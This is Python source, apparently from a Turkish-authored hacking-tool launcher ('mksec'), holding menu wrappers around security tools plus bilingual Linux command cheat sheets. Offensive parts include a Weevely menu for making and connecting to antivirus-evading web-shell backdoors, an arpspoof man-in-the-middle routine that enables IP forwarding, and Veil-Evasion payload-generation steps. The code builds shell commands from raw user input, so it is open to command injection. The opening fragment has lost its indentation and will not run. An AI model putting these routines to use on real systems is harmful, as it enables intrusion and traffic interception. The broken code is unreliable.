link = " "
listenerpassword = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[backdoor_listener]\033[37m\x1b[0m ")
UserInputs(uinput+"post")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mWeevely\x1b[37m ile olusturdugunuz backdoor'u dinlemenizi saglar.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPASSWORD{} YES Enter your backdoor password \x1b[32mex: ex: passw0rd!\x1b[37m\nHOST {} YES Backdoor location \x1b[32mex: http://192.168.10.8/dvwa/hackable/uploads/backdoor.php\x1b[37m".format(listenerpassword,link))
elif "set password" in uinput.lower():
listenerpassword = uinput
listenerpassword = listenerpassword.replace("set password ","").replace("set PASSWORD ","").replace("SET password ","").replace("SET PASSWORD ","").center(25)
elif "set host" in uinput.lower():
link = uinput
link = link.replace("set host ","").replace("set HOST ","").replace("SET host ","").replace("SET HOST ","").center(25)
elif "run" == uinput.lower():
os.system("weevely " + link.strip() + " " + listenerpassword.strip())
create = " FALSE "
listener = " FALSE "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[weevely]\033[37m\x1b[0m ")
UserInputs(uinput+"post")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mWeevely\x1b[37m, web siteleri ya da sunucularda antivirus programlarina ve guvenlik duvarlarina yakalanmayan, sizden baskasinin gorse bile anlamayacagi sifreli shell(backdoor) olusturmamizi saglar.\nOlusturulan backdoor weevely ile dinlenebilir.\nIlk once backdoor olusturun ve ardından onu dinleyin.\nSadece tek degeri 'TRUE' yapin ve 'run' komutu ile calistirin.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCREATE BACKDOOR {} OPT Set this value to 'TRUE' to create a backdoor \x1b[32mDefault value = FALSE\x1b[37m\nBACKDOOR LISTENER{} OPT Set this value to 'TRUE' to listen for a backdoor \x1b[32mDefault value = FALSE\x1b[37m".format(create,listener))
elif "set create backdoor" in uinput.lower():
create = uinput
create = create.replace("set create backdoor ","").replace("set CREATE BACKDOOR ","").replace("SET create backdoor ","").replace("SET CREATE BACKDOOR ","").center(25).upper()
elif "set backdoor listener" in uinput.lower():
listener = uinput
listener = listener.replace("set backdoor listener ","").replace("set BACKDOOR LISTENER ","").replace("SET backdoor listener ","").replace("SET BACKDOOR LISTENER ","").center(25).upper()
elif "run" == uinput.lower():
if create.lower().strip() == "true" and listener.lower().strip() == "false":
createabackdoor()
elif listener.lower().strip() == "true" and create.lower().strip() == "false":
backdoorlistener()
elif create.lower().strip() == "true" and listener.lower().strip() == "true":
print('\x1b[1m\x1b[31mYou cannot choose both.')
else:
print("\x1b[1m\x1b[31mYou have not selected one yet\x1b[1m")
def binwalk():
    """Binwalk menu: extract/inspect firmware images via `binwalk -e`."""
    import re
    # 'fmt' instead of 'format' -- the original shadowed the builtin.
    fmt = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[binwalk]\033[37m\x1b[0m ")
        UserInputs(uinput+"fore")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mBinwalk, examines hardware software. Example: .bin, .iso etc... You can also try to examine .py files.\n\x1b[33mTR:\x1b[37mBinwalk, donanımların yazılımlarını inceler. Örnek: .bin, .iso vs... Bunun yanı sıra .py dosyalarını incelemeyi deneyebilirsiniz.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFORMAT{} YES Type the location of the file you want to examine \x1b[32mex: /root/Desktop/mksec.bin\x1b[37m".format(fmt))
        elif "set format" in uinput.lower():
            # Case-insensitive strip of "set format " (original handled
            # only four exact case combinations).
            fmt = re.sub("(?i)set format ", "", uinput).center(25)
        elif "run" == uinput.lower():
            os.system("sudo binwalk -e " + fmt.strip())
            print("Process Completed")
def bulkExtractor():
    """Bulk Extractor menu: analyze a disk device or image into OUTPUT."""
    import re
    # 'source' instead of 'format' -- the original shadowed the builtin.
    source = " "
    output = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[bulk_extractor]\033[37m\x1b[0m ")
        UserInputs(uinput+"fore")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mBulk Extractor analyzes disks (dev/sda2) or image (iso) files.\n\x1b[33mTR:\x1b[37mBulk Extractor, diskleri (dev/sda2) veya imaj (iso) dosyalarını analiz eder.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFORMAT{} YES Type the location of the file you want to analyze \x1b[32mex: '/root/Desktop/debian.iso' \x1b[37mor\x1b[32m '/dev/sda2'\x1b[37m Type \x1b[32m'--my discs' \x1b[37mor \x1b[32m'-md'\x1b[37m to see your discs\nOUTPUT{} YES Output \x1b[32mex: '/root/Desktop/analysis'\x1b[37m".format(source,output))
        elif "set format" in uinput.lower():
            # Case-insensitive strip of the "set format " prefix (the
            # original's .replace() chain missed mixed-case input).
            source = re.sub("(?i)set format ", "", uinput).center(25)
        elif "set output" in uinput.lower():
            output = re.sub("(?i)set output ", "", uinput).center(25)
        elif "--my discs" == uinput.lower() or "-md" == uinput.lower():
            os.system("fdisk -l")
        elif "run" == uinput.lower():
            # Dropped the original's pointless trailing `+ ""`.
            os.system("bulk_extractor " + source.strip() + " -o " + output.strip())
            print("Process Completed")
def hashdeep():
    """Hashdeep menu: print size/md5/sha256/name for a given file."""
    import re
    # 'target' instead of 'hash' -- the original shadowed the builtin.
    target = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[hashdeep]\033[37m\x1b[0m ")
        UserInputs(uinput+"fore")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mGets the hash of a file. The data you will encounter will be in the following order. \n\x1b[33mTR:\x1b[37mBir dosyanın hash verisini elde eder. Karşılaşacağınız veriler aşağıdaki sırada olacaktır.\n'SIZE','md5','SHA256','FILENAME'")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nHASH {} YES Enter the file you want to get the hash data \x1b[32mex: '/root/Desktop/mksec.py'\x1b[37m".format(target))
        elif "set hash" in uinput.lower():
            # Case-insensitive strip of "set hash " (original handled only
            # four exact case combinations).
            target = re.sub("(?i)set hash ", "", uinput).center(25)
        elif "run" == uinput.lower():
            os.system("sudo hashdeep " + target.strip())
            print("Process Completed")
def foremost():
    """Foremost menu: carve files of a given type out of a disk device."""
    import re

    def _setting(raw, key):
        # Case-insensitive removal of "set <key> " (the original's four
        # .replace() variants missed mixed-case input like "Set Disc").
        return re.sub("(?i)" + re.escape("set " + key + " "), "", raw).center(25)

    filetype = " "
    disc = " "
    output = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[foremost]\033[37m\x1b[0m ")
        UserInputs(uinput+"fore")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mForemost finds extensions (.png, .exe etc...) inside disks.\n\x1b[33mTR:\x1b[37mForemost, disklerin içerisindeki uzantıları (.png, .exe vs...) bulur.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFILETYPE{} YES Enter the file type \x1b[32mex: <png, jpeg, pdf, exe,..., all>\x1b[37m\nDISC {} YES Select your disc \x1b[32mex: '/dev/sda1'\x1b[37m Type \x1b[32m'--my discs' \x1b[37mor \x1b[32m'-md'\x1b[37m to see your discs\nOUTPUT {} YES Output \x1b[32mex: '/root/Desktop/mksec'\x1b[37m".format(filetype,disc,output))
        elif "set filetype" in uinput.lower():
            filetype = _setting(uinput, "filetype")
        elif "set disc" in uinput.lower():
            disc = _setting(uinput, "disc")
        elif "set output" in uinput.lower():
            output = _setting(uinput, "output")
        elif "--my discs" == uinput.lower() or "-md" == uinput.lower():
            os.system("fdisk -l")
        elif "run" == uinput.lower():
            os.system("sudo foremost -t " + filetype.strip() + " -i " + disc.strip() + " -o " + output.strip())
            print("Process Completed")
def cutycapt():
    """CutyCapt menu: screenshot a website URL into an image file."""
    import re
    url = " "
    output = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[cutycapt]\033[37m\x1b[0m ")
        UserInputs(uinput+"rep")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mTakes screenshots of websites.\n\x1b[33mTR:\x1b[37mWeb sitelerinin ekran görüntüsünü alır.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target Site \x1b[32mex: github.com\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/mksec.png or .jpg\x1b[37m".format(url,output))
        elif "set url" in uinput.lower():
            # Case-insensitive strip of "set url " (original handled only
            # four exact case combinations).
            url = re.sub("(?i)set url ", "", uinput).center(25)
        elif "set output" in uinput.lower():
            output = re.sub("(?i)set output ", "", uinput).center(25)
        elif "run" == uinput.lower():
            os.system("sudo cutycapt --url=" + url.strip() + " --out=" + output.strip())
            print("Process Completed")
def pipal():
    """Pipal menu: run password-list statistics over a wordlist file.

    'run' uses the system `pipal`; 'run -f' falls back to the copy in
    /opt/pipal when the packaged binary is unavailable.
    """
    import re
    wordlist = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[pipal]\033[37m\x1b[0m ")
        UserInputs(uinput+"rep")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mPipal is a wordlist analysis tool. If it doesn't work with the \x1b[36m'run'\x1b[37m command, try the \x1b[36m'run -f'\x1b[37m command.\n\x1b[33mTR:\x1b[37mPipal, wordlist analiz aracıdır. \x1b[36m'run'\x1b[37m komutu ile çalışmıyorsa \x1b[36m'run -f'\x1b[37m komutunu deneyiniz.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nWORDLIST{} YES Type the word list location \x1b[32mex: /usr/share/fern-wifi-cracker/extras/wordlists/common.txt\x1b[37m".format(wordlist))
        elif "set wordlist" in uinput.lower():
            # Case-insensitive strip of "set wordlist "; width 60 kept
            # from the original (paths here are long).
            wordlist = re.sub("(?i)set wordlist ", "", uinput).center(60)
        elif "run" == uinput.lower():
            os.system("pipal " + wordlist.strip())
            print("Process Completed")
        elif "run -f" == uinput.lower():
            os.system("cd /opt/pipal/ && ruby pipal.rb " + wordlist.strip())
            print("Process Completed")
def arpspoof():
    """Arpspoof menu: ARP-poison TARGET against ROUTER on IFACE (MITM).

    Bug fix: the prompt label and the 'info' text were copy-pasted from
    the foremost() menu; both now describe arpspoof.
    """
    import re

    def _setting(raw, key):
        # Case-insensitive removal of "set <key> " (the original's four
        # .replace() variants missed mixed-case input).
        return re.sub("(?i)" + re.escape("set " + key + " "), "", raw).center(25)

    iface = " "
    target = " "
    router = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[arpspoof]\033[37m\x1b[0m ")
        UserInputs(uinput+"sniff")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[37m\x1b[33mArpspoof\x1b[37m, hedef cihaz ile router arasindaki trafigi uzerinizden gecirerek (MITM) dinlemenizi saglar.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIFACE {} YES Write your interface \x1b[32mex: eth0\x1b[37m\nTARGET {} YES Enter the IP address of the target device \x1b[32mex: 192.168.10.5\x1b[37m\nROUTER {} YES Enter the router IP address \x1b[32mex: '192.168.10.1'\x1b[37m".format(iface,target,router))
        elif "set iface" in uinput.lower():
            iface = _setting(uinput, "iface")
        elif "set target" in uinput.lower():
            target = _setting(uinput, "target")
        elif "set router" in uinput.lower():
            router = _setting(uinput, "router")
        elif "run" == uinput.lower():
            # Enable kernel IP forwarding so victim traffic is relayed.
            os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
            os.system("arpspoof -i " + iface.strip() + " -t " + target.strip() + " -r " + router.strip())
            print("Process Completed")
def nessus():
    """Print step-by-step Nessus install and vulnerability-scan notes
    (Turkish), then loop forever re-showing them; each <return> press is
    routed through UserInputs with the 'vuln' menu context."""
    os.system("clear")
    while 1:
        # Static instruction banner; Nessus itself is not launched here.
        print("""\x1b[1m\x1b[36m
\x1b[7mNessus\x1b[0m\x1b[1m
\x1b[37mInstall:\x1b[36m
>> linux icin nessus indir
>> cd Download/
>> dpkg -i Nessus-6.10-debian.deb
kurulum tamamlandiktan sonra local site verecektir onu kaydetmemiz gerekir. ex: https://kali:8834/
>> service nessusd start
>> https://kali:8834/
kurulumu tamamlayalim. eger aktivasyon kodu istenirse free kaydolarak alabiliriz
\x1b[37m----------------------------------------------------------------------------------------------------------------\x1b[36m
\x1b[37mZaafiyet taramasi:\x1b[36m
>> service nessusd start
>> https://kali:8834/
>> new scan
>> advanced scan
>> istedigimiz kisimlari dolduralim ve target kismina ip adresi ya da site adresi yazalim.
>> launch
\x1b[7mpress <return> to continue\x1b[0m\x1b[1m""")
        uinput = input("")
        UserInputs(uinput+"vuln")
def veil():
    """Show Veil-Evasion install/usage cheat notes once (via `echo`), then
    loop on the prompt, routing input to the 'exp' (exploitation) menu."""
    # Banner is emitted through the shell rather than print(); kept as-is.
    os.system("""echo \x1b[1m\x1b[36m'
\x1b[7mVeil\x1b[0m\x1b[1m
\x1b[37mInstall:\x1b[36m
>> apt-get install veil y
\x1b[37m----------------------------------------------------------------------------------------------------------------\x1b[36m
\x1b[37mUsage:\x1b[36m
>> veil
>> update
>> list
>> 1
>> list
>> use 14
>> set LHOST <YOUR.IP.ADDR>
>> set LPORT 8080
>> generate
>> test
\x1b[7mpress <return> to continue\x1b[0m\x1b[1m'""")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[veil]\033[37m\x1b[0m ")
        UserInputs(uinput+"exp")
def find():
    """Print a bilingual (EN/TR) `find` command cheat sheet, then loop on
    the prompt, routing input to the 'lin' (linux) menu handler.

    Bug fix: the sheet ended with a malformed escape sequence `\\x1b[37`
    (missing the final 'm'), which leaked raw bytes into the terminal and
    left the color state unreset; corrected to `\\x1b[37m`.
    """
    print("\x1b[1m\x1b[33m\x1b[7m[EN] Find Command\x1b[0m\x1b[1m\n\x1b[33mEX: find -name mert.sh\x1b[37m\nSearches for the location of the 'mert.sh' file you don't know where it is. \n\x1b[33mEX: find /etc -name local*\x1b[37m\nIt searches for all files and directories starting with 'local' in the '/etc/' directory.\n\x1b[33mEX: find -name linux -type f\x1b[37m\nLists only files with the name 'linux'.\n\x1b[33mEX: find -name linux type d\x1b[37m\nLists only directories with the name 'linux'.\n\x1b[33mEX: find -perm 777\x1b[37m\nLists files with authority '777'.\n\x1b[33mEX: find -name *.jpg\x1b[37m\nSearches for files with the '.jpg' extension. \n\x1b[33mEX: find -name *.jpg | xargs rm\x1b[37m\nThe found '.jpg' files are assigned to xargs and deleted all of them.\n\x1b[33m\x1b[1m\x1b[33m\x1b[7m[TR] Find Komutu\x1b[0m\x1b[1m\n\x1b[33mÖRN: find -name mert.sh\x1b[37m\nNerede olduğunu bilinmeyen 'mert.sh' dosyanın konumunu arar.\n\x1b[33mÖRN: find /etc -name local*\x1b[37m\n'/etc/' dizininde 'local' ile başlayan bütün dosyaları ve dizinleri arar.\n\x1b[33mÖRN: find -name linux -type f\x1b[37m\n'linux' isminin geçtiği sadece dosyaları listeler.\n\x1b[33mÖRN: find -name linux type d\x1b[37m\n'linux' isminin geçtiği sadece dizinleri listeler.\n\x1b[33mÖRN: find -perm 777\x1b[37m\n'777' yetkilendirilmesine sahip dosyaları listeler.\n\x1b[33mÖRN: find -name *.jpg\x1b[37m\n'.jpg' uzantılı dosyaları arar.\n\x1b[33mÖRN: find -name *.jpg | xargs rm\x1b[37m\nBulunan '.jpg' uzantılı dosyaları xargs'a atanır ve hepsini siler.\x1b[37m")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[find]\033[37m\x1b[0m")
        UserInputs(uinput+"lin")
def grep():
    """Print a bilingual (EN/TR) `grep` command cheat sheet, then loop on
    the prompt, routing input to the 'lin' (linux) menu handler."""
    print("\x1b[1m\x1b[33m\x1b[7mGrep Command\x1b[0m\x1b[1m\n\x1b[33mEX: grep 'mert' deneme.txt\x1b[37m\nIt searches for the word 'mert' in the 'txt' extension files in the directory you are in.\n\x1b[33mEX: grep -i 'mert' deneme.txt\x1b[37m\nThe '-i' eliminates case sensitivity.\n\x1b[33mEX: grep -i 'mert' *\x1b[37m\nThe '*' is the escape sequence. It searches all files but not directories.\n\x1b[33mEX: grep -ir 'mert' *\x1b[37m\nSearches in all files and directories.\n\x1b[33mEX: grep -ir 'mert' a*\x1b[37m\nIt searches for mert only in files and directories starting with 'a'.\n\x1b[33mEX: ls | grep 'mert'\x1b[37m\nLists files or directories containing 'mert'.\n\x1b[1m\x1b[33m\x1b[7mGrep Komutu\x1b[0m\x1b[1m\n\x1b[33mÖRN: grep 'mert' deneme.txt\x1b[37m\nBulunduğunuz dizindeki 'txt' uzantılı dosyalarda 'mert' kelimesini arar.\n\x1b[33mÖRN: grep -i 'mert' deneme.txt\x1b[37m\n'-i' büyük küçük harf duyarlılığını ortadan kaldırır.\n\x1b[33mÖRN: grep -i 'mert' *\x1b[37m\n'*' kaçış dizisidir. Bütün dosyalarda arar fakat dizinlerde aramaz.\n\x1b[33mÖRN: grep -ir 'mert' *\x1b[37m\nBütün dosya ve dizinlerde arar.\n\x1b[33mÖRN: grep -ir 'mert' a*\x1b[37m\nSadece 'a' ile başlayan dosya ve dizinlerde mert'i arar.\n\x1b[33mÖRN: ls | grep 'mert'\x1b[37m\nİçerisinde 'mert' olan dosya veya dizinleri listeler.\x1b[37m")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[grep]\033[37m\x1b[0m ")
        UserInputs(uinput+"lin")
def man():
    """Print a bilingual (EN/TR) `man` command cheat sheet, then loop on
    the prompt, routing input to the 'lin' (linux) menu handler."""
    print("\x1b[1m\x1b[33m\x1b[7mMan Command\x1b[0m\x1b[1m\n\x1b[33m>> mandb\x1b[37m\nUpdates the man database.\n\x1b[33m>> man -k [command]\x1b[37m\nIf we don't remember the name of the command, but we remember its function, we use it.\n\x1b[32mEX: man -k delete\x1b[36m\n\x1b[32mEX: man -k command\x1b[36m\n\x1b[32mEX: man -k kill\x1b[37m\n\x1b[1m\x1b[33m\x1b[7mMan Command\x1b[0m\x1b[1m\n\x1b[33m>> mandb\x1b[37m\nMan veritabanını günceller.\n\x1b[33m>> man -k [komut]\x1b[37m\nKomutun ismini hatırlamıyorsak ama işlevini hatırlıyorsak kullanırız.\n\x1b[32mÖRN: man -k sil\x1b[36m\n\x1b[32mÖRN: man -k command\x1b[36m\n\x1b[32mÖRN: man -k kill\x1b[37m")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[man]\033[37m\x1b[0m ")
        UserInputs(uinput+"lin")
def cli():
    """Print a bilingual (TR/EN) note on Linux virtual consoles
    (tty1-tty6 and the ALT/CTRL key switches), then loop on the prompt,
    routing input to the 'lin' (linux) menu handler."""
    print("\x1b[1m\x1b[33m\x1b[7mKomut Satırı Arayüzü\x1b[0m\x1b[1m\n6 farklı konsol üzerinden çalışabiliriz. Bunlardan iki tanesi grafiksel dört tanesi komut satırı arayüzüdür. Şekli aşağıdaki grafiktedir.\n\x1b[33m>> CTRL + ALT + F3\n\x1b[33m>> ALT + F1 or ALT F2\x1b[37m (Grafiksel arayüz)\n\x1b[33m>> ALT + F3, F4, F5 or F6\x1b[37m (Komut satırı arayüzü)\x1b[34m\n|----------------------------------------------|\n| Grafiksel | Komut Satırı Arayüzü |\n|tty1 tty2 | tty3 tty4 tty5 tty6 |\n|----------------------------------------------|\x1b[37m\n\n\x1b[1m\x1b[33m\x1b[7mCommand Line Interface\x1b[0m\x1b[1m\nWe can work through 6 different consoles. Two of them are graphical and four are command line interfaces. Its shape is in the graphic below.\n\x1b[33m>> CTRL + ALT + F3\n\x1b[33m>> ALT + F1 or ALT F2\x1b[37m (Graphical interface)\n\x1b[33m>> ALT + F3, F4, F5 or F6\x1b[37m (Command line interface)\x1b[34m\n|----------------------------------------------|\n| Graphical | Command Line Interface |\n|tty1 tty2 | tty3 tty4 tty5 tty6 |\n|----------------------------------------------|\x1b[37m\n")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[command_line_interface]\033[37m\x1b[0m ")
        UserInputs(uinput+"lin")
def alc():
    """'all linux commands' reference: show a language picker, then print
    the full English (1/01) or Turkish (2/02) command cheat sheet on each
    matching input; every input is also routed to the 'lin' handler."""
    RandomBannerSelector()
    # Language menu: 01 English, 02 Turkish.
    print("\x1b[1m\x1b[37m\n01\x1b[36m English\n\x1b[37m02\x1b[36m Turkish\n\x1b[37m")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[all_linux_commands]\033[37m\x1b[0m ")
        if uinput == "1" or uinput == "01":
            # English cheat sheet (files, system info, processes,
            # compression, network, permissions, setup, ssh, search,
            # shortcuts).
            print("\x1b[1m\x1b[33mFile Commands\x1b[37m\n\x1b[33m=============\x1b[37m\nls –> list directory\nls -al –> list directory with hidden files\ncd [directory] –> change directory\ncd –> go to home directory\npwd –> view current directory\nmkdir [directory] –> create a new directory\nrm [file] –> delete file\nrm -r [directory] -> delete directory\nrm -f [file] –> force delete file\nrm -rf [directory] –> force delete directory\ncp [directory1] [directory2] –> copy directory1 to directory2\ncp -r [directory1] [directory2] –> copy directory1 to directory2; if index2 doesn't exist, create this\nmv [file1] [file2] –> rename or move file1 to file2. If file2 exists, move the contents of file1 into file2\nln -s [file] [link] –> create symboliclink to file or link\ntouch [file] –> create or update file\ncat > [file] –> create standard input to file\nmore [file] –> view the contents of the file\nhead [file] –> show first 10 lines of file\ntail [file] –> show last 10 lines of file\ntail -f [file] –> show last 10 lines of file and all\n\x1b[33mSystem Information\n\x1b[33m==================\x1b[37m\ndate –> show current date and time\ncal –> show this month's calendar\nuptime –> show current service time\nw –> show who is online\nwhoami –> show logged in person\nfinger [user] –> information about the user\nuname -a –> show kernel info\ncat /proc/cpuinfo –> cpu info\ncat /proc/meminfo –> memory information\nman [command] –> show manual for command\ndf –> show disk usage\ndu –> show size usage of directories\nfree –> show memory and swap usage\nwhereis [app] –> probable location of the app\nwhich [app] –> show which application directories are running by default\n\x1b[33mProcess Management\n==================\x1b[37m\nps –> show active processes\ntop –> show all processes\nkill [pid] –> kill process with pid header\nkillall proc –> End all processes with title proc *\nbg –> lists stopped or trailing tasks; resumes a stopped task in the background\nfg –> reveals the most current task\nfg [n] –> Brings task n to the front\n\x1b[33mCompression\n===========\x1b[37m\ntar cf [file.tar] [files] –> Create a file named file.tar containing the files in the directory.\ntar xf [file.tar] –> Extract file.tar\ntar czf [file.tar.gz] files –> Generate a tar file with gzip\ntar xzf [files.tar.gz] –> Extract directory with gzip\ntar cjf [file.tar.bz2] –> Prepare a tar file with bzip2\ntar xjf [file.tar.bz2] –> Extract directory with bzip2\ngzip [file] –> compress file and rename to file.gz\ngzip -d [file.gz] –> Extract file.gz back as a file\n\x1b[33mNetwork\n=======\x1b[37m\nping [host] –> ping the host and show the result\nwhois [domain] –> whois information for the domain\ndig [domain] –> DNS information for the domain\ndig -x [host] –> reverse host solution\nwget [file] –> download file\nwget -c [file] –> continue download\n\x1b[33mFile Permissions\n==============\x1b[37m\nchmod [code] [file] –> change file permissions, these permissions vary for different categories (like user, group and everyone):\n• 4 = read (r)\n• 2 = write (w)\n• 1 = execute (x)\nexamples:\nchmod 777 –> read, write, execute for everyone\nchmod 755 –> rwx is for the owner, rx is for the group and everyone.\nfor more: man chmod\n\x1b[33mSetup\n=====\x1b[37m\nInstallation from source:\n./configure\nmake\nmake install\ndpkg -i pkg.deb –> package installation (debian)\nrpm -Uvh pkg.rpm –> package installation (RPM)\n\x1b[33mSSH\n===\x1b[37m\nssh [user@host] –> connect to server as user\nssh -p [port] [user@host] –> connect to server via port as user\nssh-copy-id [user@host] –> add key for user and login with key and no password\n\x1b[33mSearch\n=====\x1b[37m\ngrep [pattern] [files] –> look for patterns in files\ngrep -r [pattern] [dir] –> search the directory recursively for the pattern\n[command] | grep [pattern] –> look for pattern in command output\nlocate [file] –> search all instances of file\n\x1b[33mShortcuts\n=========\x1b[37m\nCtrl+C –> stops the current command\nCtrl+Z –> stops the current command, resumes the command with 'fg' in front or 'bg' in back\nCtrl+D –> log out like exit\nCtrl+W –> deletes a word in a line\nCtrl+U –> deletes the entire row\nCtrl+R –> bring the last command to the front\nCtrl+P –> show last command\n!! -> repeat the last command\nexit –> log out\x1b[37m")
        elif uinput == "2" or uinput == "02":
            # Turkish cheat sheet (same sections as the English one).
            print("\x1b[1m\x1b[33mDosya Komutları\x1b[37m\n\x1b[33m===============\x1b[37m\n\nls –> dizini listele\nls -al –> dizini gizli dosyalarla birlikte listele\ncd [dizin] –> dizini değiştir\ncd –> ev dizinine git\npwd –> o anda bulunulan dizini görüntüle\nmkdir [dizin] –> yeni bir dizin oluştur\nrm [dosya] –> dosya sil\nrm -r [dizin] –> dizin sil\nrm -f [dosya] –> dosya'yı silmeye zorla\nrm -rf [dizin] –> dizini silmeye zorla\ncp [dizin1] [dizin2] –> dizin1 'i, dizin2 'ye kopyala\ncp -r [dizin1] [dizin2] –> dizin1'i, dizin2'ye kopyala; eğer dizin2 yoksa oluştur\nmv [dosya1] [dosya2] –> dosya1 'i dosya2 'ye yeniden adlandır veya taşı. eğer, dosya2 varsa, dosya1 içeriğini dosya2 içine taşı\nln -s [dosya] [link] –> dosya veya link'e semnoliklink oluştur\ntouch [dosya] –> dosya'yı oluştur veya güncelle\ncat > [dosya] –> dosya'ya standart girdi oluştur\nmore [dosya] –> dosya'nın içeriğini görüntüle\nhead [dosya] –> dosya'nın ilk 10 satırını göster\ntail [dosya] –> dosya'nın son 10 satırını göster\ntail -f [dosya] –> dosya'nın son 10 satırını ve tümünü göster\n\x1b[33mSistem Bilgisi\n\x1b[33m==============\x1b[37m\ndate –> şu anki tarih ve saati göster\ncal –> bu ayın takvimini göster\nuptime –> şu anki hizmet süresini göster\nw –> kimin online olduğunu göster\nwhoami –> oturum açan kişiyi göster\nfinger [kullanıcı] –> kullanıcı hakkında bilgi\nuname -a –> kernel bilgisini göster\ncat /proc/cpuinfo –> cpu bilgisi\ncat /proc/meminfo –> hafıza bilgisi\nman [komut] –> komut için manueli göster\ndf –> disk kullanımı göster\ndu –> dizinlerin boyut kullanımı göster\nfree –> hafıza ve swap kullanımı göster\nwhereis [uygulama] –> uygulama muhtemel yeri\nwhich [uygulama] –> varsayılan olarak hangi uygulama dizinlerinin çalıştığını göster\n\x1b[33mİşlem Yönetimi\n==============\x1b[37m\nps –> etkin işlemleri göster\ntop –> tüm işlemleri göster\nkill [pid] –> pid başlıklı işlemi sonlandır\nkillall proc –> proc * başlıklı tüm işlemleri bitir\nbg –> durdurulmuş veya arkada süren görevleri listeler; arkada durdurulmuş bir görevi kaldığı yerden sürdürür\nfg –> en güncel görevi ortaya koyar\nfg [n] –> n adlı görevi öne getirir\n\x1b[33mSıkıştırma\n==========\x1b[37m\ntar cf [dosya.tar] [dosyalar] –> dizindeki dosyaları içeren dosya.tar adında bir dosya oluştur.\ntar xf [dosya.tar] –> dosya.tar dosyasındakileri çıkar\ntar czf [dosya.tar.gz] [dosyalar] –> Gzip ile bir tar dosyası oluştur\ntar xzf [dosyalar.tar.gz] – Gzip ile dizin çıkar\ntar cjf [dosya.tar.bz2] –> Bzip2 ile bir tar dosyası hazırla\ntar xjf [dosya.tar.bz2] –> Bzip2 ile dizin 